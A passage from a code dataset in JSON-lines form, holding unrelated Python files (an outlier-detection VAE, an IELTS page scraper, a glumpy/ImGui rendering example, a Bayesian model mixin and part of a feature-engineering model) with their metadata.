{\"type\":\"GAUGE\",\"key\":\"f2_roll\",\"value\":self.metric[13]}\n \n true_negative = {\"type\":\"GAUGE\",\"key\":\"true_negative\",\"value\":self.metric[0]}\n false_positive = {\"type\":\"GAUGE\",\"key\":\"false_positive\",\"value\":self.metric[1]}\n false_negative = {\"type\":\"GAUGE\",\"key\":\"false_negative\",\"value\":self.metric[2]}\n true_positive = {\"type\":\"GAUGE\",\"key\":\"true_positive\",\"value\":self.metric[3]}\n \n nb_outliers_roll = {\"type\":\"GAUGE\",\"key\":\"nb_outliers_roll\",\"value\":self.metric[14]}\n nb_labels_roll = {\"type\":\"GAUGE\",\"key\":\"nb_labels_roll\",\"value\":self.metric[15]}\n nb_outliers_tot = {\"type\":\"GAUGE\",\"key\":\"nb_outliers_tot\",\"value\":self.metric[16]}\n nb_labels_tot = {\"type\":\"GAUGE\",\"key\":\"nb_labels_tot\",\"value\":self.metric[17]}\n \n return [is_outlier,mse,obs,threshold,label,\n accuracy_tot,precision_tot,recall_tot,f1_score_tot,f2_score_tot,\n accuracy_roll,precision_roll,recall_roll,f1_score_roll,f2_score_roll,\n true_negative,false_positive,false_negative,true_positive,\n nb_outliers_roll,nb_labels_roll,nb_outliers_tot,nb_labels_tot]", "sub_path": "components/outlier-detection/vae/OutlierVAE.py", "file_name": "OutlierVAE.py", "file_ext": "py", "file_size_in_byte": 8229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pickle.load", "line_number": 31, "usage_type": "call"}, {"api_name": "model.model", "line_number": 34, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 41, "usage_type": "call"}, {"api_name": "random.random", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": 
"numpy.mean", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 114, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.performance", "line_number": 132, "usage_type": "call"}, {"api_name": "utils.outlier_stats", "line_number": 133, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "152678317", "text": "import urllib.request\nfrom bs4 import BeautifulSoup\nfrom docx import Document\nimport re\n\nquote_page='http://ielts.zhan.com/kouyu44552.html'\n\npage=urllib.request.urlopen(quote_page)\n\nsoup=BeautifulSoup(page,'html.parser')\n\nfile_count=1\n\nfor ultag in soup.find_all('td'):\n Tag_a=ultag.find('a')\n if Tag_a is not None:\n child_link=Tag_a['href']\n doc_name_tmp1=Tag_a.text\n doc_name_tmp2=re.sub(r'[0-9]','',doc_name_tmp1)\n doc_name_tmp2=re.sub(r'[0-9][0-9]','',doc_name_tmp2)\n doc_name_tmp2 = re.sub(r'\\r\\n','',doc_name_tmp2)\n\n doc_name_tmp2=doc_name_tmp2.replace('.','')\n doc_name_tmp2 = doc_name_tmp2.replace('|', '_')\n doc_name_tmp2 = doc_name_tmp2.replace('?', '')\n # print(child_link)\n # print(doc_name_tmp1)\n # print(doc_name_tmp2)\n # print(\"\\n\")\n\n file_count_str=str(file_count)\n file_count_format=file_count_str.zfill(2)\n file_docx=Document()\n name_doc=file_count_format+'_'+doc_name_tmp2+'.docx'\n print(\"Output word file is:\")\n print(name_doc)\n print(\"\\n\")\n\n child_page=urllib.request.urlopen(child_link)\n child_soup=BeautifulSoup(child_page,'html.parser')\n # print(child_link)\n for child_ultag in child_soup.find_all('div',{'class': 'article-content'}):\n for para in child_ultag.find_all('p'):\n # print(para.text)\n file_docx.add_paragraph(para.text)\n\n file_docx.save(name_doc)\n file_count = file_count + 1", "sub_path": "IELTs_materials/IELTs_speaking.py", "file_name": "IELTs_speaking.py", "file_ext": "py", "file_size_in_byte": 1532, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 8, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 8, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 8, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 10, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 19, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "docx.Document", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 39, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 39, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "286858277", "text": "# -----------------------------------------------------------------------------\n# Copyright (c) 
2009-2016 Nicolas P. Rougier. All rights reserved.\n# Distributed under the (new) BSD License.\n# -----------------------------------------------------------------------------\nfrom glumpy import app, gl, gloo\nfrom glumpy.geometry import colorcube\nfrom glumpy.transforms import TrackballPan, Position\n\nimport imgui\nfrom imgui.integrations.glfw import GlfwRenderer\n\n\nvertex = \"\"\"\n\nuniform vec4 u_color;\nattribute vec3 position;\nattribute vec4 color;\nvarying vec4 v_color;\n\nvoid main()\n{\n v_color = u_color * color;\n gl_Position = <transform>;\n}\n\"\"\"\n\nfragment = \"\"\"\nvarying vec4 v_color;\n\nvoid main()\n{\n gl_FragColor = v_color;\n}\n\"\"\"\n\n\napp.use(\"glfw\") # Required for ImGui integration\nwindow = app.Window(width=1024, height=1024,\n color=(0.30, 0.30, 0.35, 1.00))\n\n# Build cube data\nV, I, O = colorcube()\nvertices = V.view(gloo.VertexBuffer)\nfaces = I.view(gloo.IndexBuffer)\noutline = O.view(gloo.IndexBuffer)\n\ncube = gloo.Program(vertex, fragment)\ncube.bind(vertices)\n\n# create an instance of the TrackballPan object.\ntrackball = TrackballPan(Position(\"position\"), znear=3, zfar=10, distance=5)\ncube['transform'] = trackball\n\ntrackball.aspect = 1\n# rotation around the X axis\ntrackball.phi = 0\n# rotation around the Y axis\ntrackball.theta = 0\ntrackball.zoom = 50\n\n\n@window.event\ndef on_draw(dt):\n # GUI\n imguiRenderer.process_inputs()\n imgui.new_frame()\n\n if imgui.begin_main_menu_bar():\n if imgui.begin_menu(\"File\", True):\n clicked, selected = imgui.menu_item(\"Quit\", 'ESC', False, True)\n if clicked:\n exit(0)\n imgui.end_menu()\n\n imgui.end_main_menu_bar()\n\n imgui.begin('Cube')\n changed, zoom = imgui.slider_float('zoom', trackball.zoom, 15, 90)\n if changed: trackball.zoom = zoom\n imgui.end()\n\n imgui.end_frame()\n imgui.render()\n\n\n window.clear()\n\n # Filled cube\n gl.glDisable(gl.GL_BLEND)\n gl.glEnable(gl.GL_DEPTH_TEST)\n gl.glEnable(gl.GL_POLYGON_OFFSET_FILL)\n cube['u_color'] = 1, 1, 1, 1\n cube.draw(gl.GL_TRIANGLES, faces)\n\n # Outlined cube\n gl.glDisable(gl.GL_POLYGON_OFFSET_FILL)\n gl.glEnable(gl.GL_BLEND)\n gl.glDepthMask(gl.GL_FALSE)\n cube['u_color'] = 0, 0, 0, 1\n cube.draw(gl.GL_LINES, outline)\n gl.glDepthMask(gl.GL_TRUE)\n\n imguiRenderer.render(imgui.get_draw_data())\n\n\nwindow.attach(cube['transform'])\n\n\n# ImGui\nimgui.create_context()\nimguiRenderer = GlfwRenderer(window._native_window, attach_callbacks=False) # here lives the devil\n\n\n# OpenGL\ngl.glEnable(gl.GL_DEPTH_TEST)\ngl.glPolygonOffset(1, 1)\ngl.glEnable(gl.GL_LINE_SMOOTH)\ngl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n\n\n# Run\napp.run()\n\n\n\n\n\n\n# Finish ImGui\n#imguiRenderer.shutdown()\n", "sub_path": "examples/imgui-raw-integration.py", "file_name": "imgui-raw-integration.py", "file_ext": "py", "file_size_in_byte": 2828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "glumpy.app.use", "line_number": 37, "usage_type": "call"}, {"api_name": "glumpy.app", "line_number": 37, "usage_type": "name"}, {"api_name": "glumpy.app.Window", "line_number": 38, "usage_type": "call"}, {"api_name": "glumpy.app", "line_number": 38, "usage_type": "name"}, {"api_name": "glumpy.geometry.colorcube", "line_number": 42, "usage_type": "call"}, {"api_name": "glumpy.gloo.VertexBuffer", "line_number": 43, "usage_type": "attribute"}, {"api_name": "glumpy.gloo", "line_number": 43, "usage_type": "name"}, {"api_name": "glumpy.gloo.IndexBuffer", "line_number": 44, "usage_type": 
"attribute"}, {"api_name": "glumpy.gloo", "line_number": 44, "usage_type": "name"}, {"api_name": "glumpy.gloo.IndexBuffer", "line_number": 45, "usage_type": "attribute"}, {"api_name": "glumpy.gloo", "line_number": 45, "usage_type": "name"}, {"api_name": "glumpy.gloo.Program", "line_number": 47, "usage_type": "call"}, {"api_name": "glumpy.gloo", "line_number": 47, "usage_type": "name"}, {"api_name": "glumpy.transforms.TrackballPan", "line_number": 51, "usage_type": "call"}, {"api_name": "glumpy.transforms.Position", "line_number": 51, "usage_type": "call"}, {"api_name": "imgui.new_frame", "line_number": 66, "usage_type": "call"}, {"api_name": "imgui.begin_main_menu_bar", "line_number": 68, "usage_type": "call"}, {"api_name": "imgui.begin_menu", "line_number": 69, "usage_type": "call"}, {"api_name": "imgui.menu_item", "line_number": 70, "usage_type": "call"}, {"api_name": "imgui.end_menu", "line_number": 73, "usage_type": "call"}, {"api_name": "imgui.end_main_menu_bar", "line_number": 75, "usage_type": "call"}, {"api_name": "imgui.begin", "line_number": 77, "usage_type": "call"}, {"api_name": "imgui.slider_float", "line_number": 78, "usage_type": "call"}, {"api_name": "imgui.end", "line_number": 80, "usage_type": "call"}, {"api_name": "imgui.end_frame", "line_number": 82, "usage_type": "call"}, {"api_name": "imgui.render", "line_number": 83, "usage_type": "call"}, {"api_name": "glumpy.gl.glDisable", "line_number": 89, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 89, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_BLEND", "line_number": 89, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glEnable", "line_number": 90, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 90, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_DEPTH_TEST", "line_number": 90, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glEnable", "line_number": 91, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 91, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_POLYGON_OFFSET_FILL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "glumpy.gl.GL_TRIANGLES", "line_number": 93, "usage_type": "attribute"}, {"api_name": "glumpy.gl", "line_number": 93, "usage_type": "name"}, {"api_name": "glumpy.gl.glDisable", "line_number": 96, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 96, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_POLYGON_OFFSET_FILL", "line_number": 96, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glEnable", "line_number": 97, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 97, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_BLEND", "line_number": 97, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glDepthMask", "line_number": 98, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 98, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_FALSE", "line_number": 98, "usage_type": "attribute"}, {"api_name": "glumpy.gl.GL_LINES", "line_number": 100, "usage_type": "attribute"}, {"api_name": "glumpy.gl", "line_number": 100, "usage_type": "name"}, {"api_name": "glumpy.gl.glDepthMask", "line_number": 101, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 101, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_TRUE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "imgui.get_draw_data", "line_number": 103, "usage_type": "call"}, {"api_name": "imgui.create_context", "line_number": 110, "usage_type": "call"}, {"api_name": "imgui.integrations.glfw.GlfwRenderer", "line_number": 111, 
"usage_type": "call"}, {"api_name": "glumpy.gl.glEnable", "line_number": 115, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 115, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_DEPTH_TEST", "line_number": 115, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glPolygonOffset", "line_number": 116, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 116, "usage_type": "name"}, {"api_name": "glumpy.gl.glEnable", "line_number": 117, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 117, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_LINE_SMOOTH", "line_number": 117, "usage_type": "attribute"}, {"api_name": "glumpy.gl.glBlendFunc", "line_number": 118, "usage_type": "call"}, {"api_name": "glumpy.gl", "line_number": 118, "usage_type": "name"}, {"api_name": "glumpy.gl.GL_SRC_ALPHA", "line_number": 118, "usage_type": "attribute"}, {"api_name": "glumpy.gl.GL_ONE_MINUS_SRC_ALPHA", "line_number": 118, "usage_type": "attribute"}, {"api_name": "glumpy.app.run", "line_number": 122, "usage_type": "call"}, {"api_name": "glumpy.app", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "413778925", "text": "import numpy as np\nimport logging\nfrom .._utils import normal_logpdf\nlogger = logging.getLogger(name=__name__)\n\n\nclass MuMixin(object):\n # Mixin for Mu[0], ..., Mu[num_states-1] variables\n def _set_dim(self, **kwargs):\n if 'mu' in kwargs:\n num_states, m = np.shape(kwargs['mu'])\n else:\n raise ValueError(\"mu not provided\")\n\n if \"num_states\" in self.dim:\n if num_states != self.dim['num_states']:\n raise ValueError(\"mu.shape[0] does not match existing dims\")\n else:\n self.dim['num_states'] = num_states\n if \"m\" in self.dim:\n if m != self.dim['m']:\n raise ValueError(\"mu.shape[1] does not match existing dims\")\n else:\n self.dim['m'] = m\n super()._set_dim(**kwargs)\n return\n\n def _set_var_dict(self, **kwargs):\n if 'mu' in kwargs:\n self.var_dict['mu'] = np.array(kwargs['mu']).astype(float)\n else:\n raise ValueError(\"mu not provided\")\n\n super()._set_var_dict(**kwargs)\n return\n\n @classmethod\n def _from_dict_to_vector(cls, vector_list, var_dict, **kwargs):\n vector_list.append(var_dict['mu'].flatten())\n return super()._from_dict_to_vector(vector_list, var_dict, **kwargs)\n\n @classmethod\n def _from_vector_to_dict(cls, var_dict, vector, **kwargs):\n num_states, m = kwargs['num_states'], kwargs['m']\n mu = np.reshape(vector[0:num_states*m], (num_states, m))\n var_dict['mu'] = mu\n var_dict = super()._from_vector_to_dict(\n var_dict, vector[num_states*m:], **kwargs)\n return var_dict\n\n @property\n def mu(self):\n mu = self.var_dict['mu']\n return mu\n @mu.setter\n def mu(self, mu):\n self.var_dict['mu'] = mu\n return\n\n @property\n def num_states(self):\n return self.dim['num_states']\n @property\n def m(self):\n return self.dim['m']\n\n\nclass MuPrior(object):\n # Mixin for Mu variable\n def _set_hyperparams(self, **kwargs):\n if 'mean_mu' in kwargs:\n num_states, m = np.shape(kwargs['mean_mu'])\n else:\n raise ValueError(\"mean_mu must be provided\")\n if 'var_col_mu' in kwargs:\n num_states2 = np.shape(kwargs['var_col_mu'])[0]\n else:\n raise ValueError(\"mean_mu must be provided\")\n\n if num_states != num_states2:\n raise ValueError(\"mean_mu + var_col_mu don't match\")\n\n if \"num_states\" in self.dim:\n if num_states != self.dim['num_states']:\n raise ValueError(\"num_states do not match existing dims\")\n else:\n self.dim['num_states'] = num_states\n if \"m\" in self.dim:\n if m != self.dim['m']:\n raise 
ValueError(\"m do not match existing dims\")\n else:\n self.dim['m'] = m\n\n self.hyperparams['mean_mu'] = kwargs['mean_mu']\n self.hyperparams['var_col_mu'] = kwargs['var_col_mu']\n super()._set_hyperparams(**kwargs)\n return\n\n def _sample_prior_var_dict(self, var_dict, **kwargs):\n # Requires Rinvs defined\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n if \"Rinvs\" in kwargs:\n Rinvs = kwargs['Rinvs']\n elif \"Rinv\" in kwargs:\n Rinvs = np.array([kwargs['Rinv']\n for _ in range(self.dim['num_states'])])\n else:\n raise ValueError(\"Missing Covariance\")\n\n mus = [None for k in range(self.dim['num_states'])]\n for k in range(len(mus)):\n mu_k = np.random.multivariate_normal(\n mean=mean_mu[k],\n cov=var_col_mu[k]*np.linalg.inv(Rinvs[k]),\n )\n\n mus[k] = mu_k\n var_dict['mu'] = np.array(mus)\n var_dict = super()._sample_prior_var_dict(var_dict, **kwargs)\n return var_dict\n\n def _sample_post_var_dict(self, var_dict, sufficient_stat, **kwargs):\n # Requires Rinvs defined\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n if \"Rinvs\" in kwargs:\n Rinvs = kwargs['Rinvs']\n elif \"Rinv\" in kwargs:\n Rinvs = np.array([kwargs['Rinv']\n for _ in range(self.dim['num_states'])])\n else:\n raise ValueError(\"Missing Covariance\")\n\n mus = [None for k in range(self.dim['num_states'])]\n for k in range(0, self.dim['num_states']):\n S_prevprev = var_col_mu[k]**-1 + sufficient_stat['S_prevprev'][k]\n S_curprev = \\\n var_col_mu[k]**-1*mean_mu[k] + sufficient_stat['S_curprev'][k]\n post_mean_mu_k = S_curprev/S_prevprev\n mu_k = np.random.multivariate_normal(\n mean=post_mean_mu_k,\n cov=np.linalg.inv(Rinvs[k])/S_prevprev,\n )\n\n mus[k] = mu_k\n var_dict['mu'] = np.array(mus)\n var_dict = super()._sample_post_var_dict(\n var_dict, sufficient_stat, **kwargs)\n return var_dict\n\n def _logprior(self, logprior, parameters, **kwargs):\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n for mu_k, mean_mu_k, var_col_mu_k, LRinv_k in zip(parameters.mu,\n mean_mu, var_col_mu, parameters.LRinv):\n logprior += normal_logpdf(mu_k,\n mean=mean_mu_k,\n Lprec=var_col_mu_k**0.5 * LRinv_k,\n )\n\n logprior = super()._logprior(logprior, parameters, **kwargs)\n return logprior\n\n def _grad_logprior(self, grad, parameters, **kwargs):\n mean_mu = self.hyperparams['mean_mu']\n var_col_mu = self.hyperparams['var_col_mu']\n Rinv = parameters.Rinv\n grad_mu = np.array([\n -1.0*np.dot(var_col_mu[k]**-1 * Rinv[k],\n parameters.mu[k] - mean_mu[k])\n for k in range(self.dim['num_states'])\n ])\n grad['mu'] = grad_mu\n grad = super()._grad_logprior(grad, parameters, **kwargs)\n return grad\n\n @classmethod\n def _get_default_kwargs(cls, default_kwargs, **kwargs):\n num_states = kwargs['num_states']\n m = kwargs['m']\n var = kwargs['var']\n\n default_kwargs['mean_mu'] = np.zeros((num_states, m), dtype=float)\n default_kwargs['var_col_mu'] = np.array([\n var for _ in range(num_states)\n ], dtype=float)\n\n default_kwargs = super()._get_default_kwargs(default_kwargs, **kwargs)\n return default_kwargs\n\n @classmethod\n def _get_prior_kwargs(cls, prior_kwargs, parameters, **kwargs):\n var = kwargs['var']\n if kwargs.get('from_mean', False):\n mean_mu = parameters.mu\n else:\n mean_mu = np.zeros_like(parameters.mu, dtype=float)\n var_col_mu = np.array([\n var*1.0 for _ in range(parameters.num_states)\n ], dtype=float)\n\n prior_kwargs['mean_mu'] = mean_mu\n prior_kwargs['var_col_mu'] = var_col_mu\n prior_kwargs = 
super()._get_prior_kwargs(\n prior_kwargs, parameters, **kwargs)\n return prior_kwargs\n\n def _get_R_hyperparam_mean_var_col(self):\n return self.hyperparams['mean_mu'], self.hyperparams['var_col_mu']\n\n\nclass MuPreconditioner(object):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n return\n\n def _precondition(self, precond_grad, grad, parameters, **kwargs):\n R = parameters.R\n precond_mu = np.array([\n np.dot(R[k], grad['mu'][k])\n for k in range(parameters.num_states)\n ])\n precond_grad['mu'] = precond_mu\n precond_grad = super()._precondition(precond_grad, grad,\n parameters, **kwargs)\n return precond_grad\n\n def _precondition_noise(self, noise, parameters, **kwargs):\n LRinv = parameters.LRinv\n precond_mu = np.array([\n np.linalg.solve(LRinv[k].T,\n np.random.normal(loc=0, size=(parameters.m)),\n )\n for k in range(parameters.num_states)\n ])\n noise['mu'] = precond_mu\n super()._precondition_noise(noise, parameters, **kwargs)\n return noise\n\n def _correction_term(self, correction, parameters, **kwargs):\n correction['mu'] = np.zeros_like(parameters.mu, dtype=float)\n super()._correction_term(correction, parameters, **kwargs)\n return correction\n\n", "sub_path": "code/sgmcmc_ssm/variable_mixins/mu_variable.py", "file_name": "mu_variable.py", "file_ext": "py", "file_size_in_byte": 8571, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.linalg.inv", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.linalg.inv", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "_utils.normal_logpdf", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 231, "usage_type": "call"}, {"api_name": 
"numpy.linalg.solve", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 232, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 242, "usage_type": "call"}]} +{"seq_id": "166675300", "text": "import ah_config\nimport ah_datadog\nimport ah_db\nimport csv\nimport os\nimport pandas as pd\nimport time\nimport traceback\nfrom modeling.feature.feature_activation import ActivationFeature, Restore\nfrom modeling.feature.feature_bank import BankFeature_predict, BankFeature\nfrom modeling.feature.feature_payroll import Payroll\nfrom modeling.feature.feature_device import DeviceFeature\nfrom modeling.feature.feature_season import SeasonFeature\nfrom modeling.feature.feature_user import UserFeature\nfrom modeling.feature.feature_employment import EmploymentFeature\nfrom modeling.feature.feature_cs import CSFeature\nfrom modeling.feature.feature_timesheet import TimeSheetFeature\nfrom datetime import datetime, timedelta\nfrom modeling.feature.feature_generator import FeatureGenerator\nfrom modeling.feature.feature_new import NewFeature\nfrom modeling.feature.feature_currentMax import CurrentMaxFeature\nfrom modeling.misc.misc import get_df\nfrom multiprocessing import Pool\n\n\nclass MaxAdjustmentModel:\n def __init__(self):\n self.dummyVar=[]\n self.pkl_path = os.path.dirname(os.path.abspath(__file__))+'/'\n\n def getAllUserId(self):\n\n start_date = '2018-11-01'\n end_date = '2018-12-31'\n\n sql_money = '''\n SELECT distinct ft.userid\n FROM fundstransfers ft\n JOIN transferattempts ta\n ON ta.FundsTransferId = ft.FundsTransferId\n WHERE ft.FundsTransferReasonId = 2 \n AND ft.postingdate between '{0}' and '{1}'\n AND ta.FundsTransferStatusId in (5, 7)\n AND ta.TransferAttemptId = GetDefiningTransferAttemptId(ft.FundsTransferId)\n ORDER BY ft.userid\n '''.format(start_date, end_date)\n\n with ah_db.open_mysql_cursor('moneyMovement') as cursor:\n cursor.execute(sql_money)\n df_money = pd.DataFrame(cursor.fetchall())\n\n with ah_db.open_mysql_cursor('miscellaneous') as cursor:\n sql_misc = '''SELECT userid from testusers'''\n cursor.execute(sql_misc)\n df_misc = pd.DataFrame(cursor.fetchall())\n\n df = df_money.merge(df_misc, on='userid', how='left', indicator=True)\n df = df['userid'][df['_merge'] == 'left_only']\n return [l for l in df]\n\n\n def createDerivedFeature(self,fg):\n self.dummyVar=['actDayOfWeek','derived_employerid','cs_lastAudit1Username','cs_lastAuditSource','cs_lastAuditType',\n 'cs_lastAuditUsername','device_lastInstallOS','payroll_lastPayrollSetupBy','payroll_paycycleFrequencyId','payroll_paytypeid'\n ]\n\n if fg.f['activation_aveAmtPerAct_Wk12']>99.9: fg.f['derived_aveAmtPerAct_Wk12_100']=1\n else: fg.f['derived_aveAmtPerAct_Wk12_100']=0\n\n if fg.f['activation_aveCntActCancel_Wk2']>0: fg.f['derived_aveCntActCancel_Wk2_GT0']=1\n else: fg.f['derived_aveCntActCancel_Wk2_GT0']=0\n\n if fg.f['activation_aveDayGapAct_Wk2']>13: fg.f['derived_aveDayGapAct_Wk2_14']=1\n else: fg.f['derived_aveDayGapAct_Wk2_14']=0\n\n if fg.f['activation_aveTip_Wk2']>9: fg.f['derived_aveTip_Wk2_GT9']=1\n else: fg.f['derived_aveTip_Wk2_GT9']=0\n\n if fg.f['activation_aveTip_Wk12']>9: fg.f['derived_aveTip_Wk12_GT9']=1\n else: fg.f['derived_aveTip_Wk12_GT9']=0\n\n 
fg.f['derived_daySinceLastFailRestoreGT90']=fg.f['derived_daySinceLastFailRestore61to90']=fg.f['derived_daySinceLastFailRestore31to60']=fg.f['derived_daySinceLastFailRestore15to30']=fg.f['activation_derived_daySinceLastFailRestoreLT15']=0\n if fg.f['activation_daySinceLastFailRestore']>90: fg.f['derived_daySinceLastFailRestoreGT90']=1\n elif fg.f['activation_daySinceLastFailRestore']>60: fg.f['derived_daySinceLastFailRestore61to90']=1\n elif fg.f['activation_daySinceLastFailRestore']>30: fg.f['derived_daySinceLastFailRestore31to60']=1\n elif fg.f['activation_daySinceLastFailRestore']>14: fg.f['derived_daySinceLastFailRestore15to30']=1\n else: fg.f['activation_derived_daySinceLastFailRestoreLT15']=1\n\n fg.f['derived_daySinceLastRestoreGT30']=fg.f['derived_daySinceLastRestore15to30']=fg.f['derived_daySinceLastRestoreLT15']=0\n if fg.f['activation_daySinceLastRestore']>30: fg.f['derived_daySinceLastRestoreGT30']=1\n elif fg.f['activation_daySinceLastRestore']>14: fg.f['derived_daySinceLastRestore15to30']=1\n else: fg.f['derived_daySinceLastRestoreLT15']=1\n\n\n fg.f['derived_employerid']=fg.f['employment_employer']\n\n if fg.f['payroll_hourlyRate'] is None:\n fg.f['derived_hourlyRateGT20'] = 0\n elif fg.f['payroll_hourlyRate'] > 20:\n fg.f['derived_hourlyRateGT20'] = 1\n else:\n fg.f['derived_hourlyRateGT20'] = 0\n\n if fg.f['payroll_lastPayrollStatus']!=11: fg.f['derived_lastPayrollStatus11']=0\n else: fg.f['derived_lastPayrollStatus11']=1\n\n if fg.f['cs_nCredit']>0: fg.f['derived_hasCSCredit']=1\n else: fg.f['derived_hasCSCredit']=0\n\n if fg.f['employment_nEmployer']>5: fg.f['derived_nEmployerGT5']=1\n else: fg.f['derived_nEmployerGT5']=0\n\n def createInterFeature(self, fg):\n\n fg.f['bank_employer'] = str(fg.f['bank_getInstitutionId']) + '_' + str(fg.f['employment_employer'])\n fg.f['inter_amtActCurrent_aveAmtAct_Wk12'] = fg.f['activation_amtActCurrent'] / (\n fg.f['activation_aveAmtAct_Wk12'] + 0.01)\n fg.f['inter_amtActCurrent_aveAmtAct_Wk2'] = fg.f['activation_amtActCurrent'] / (\n fg.f['activation_aveAmtAct_Wk2'] + 0.01)\n fg.f['inter_amtActCurrent_aveAmtAct_trend'] = fg.f['inter_amtActCurrent_aveAmtAct_Wk2'] / (\n fg.f['inter_amtActCurrent_aveAmtAct_Wk12'] + 0.01)\n del fg.f['inter_amtActCurrent_aveAmtAct_Wk12']\n fg.f['inter_weekly_act_cnt_Wk2'] = fg.f['activation_amtActCurrent'] / (\n fg.f['activation_aveAmtPerAct_Wk2'] + 0.01)\n 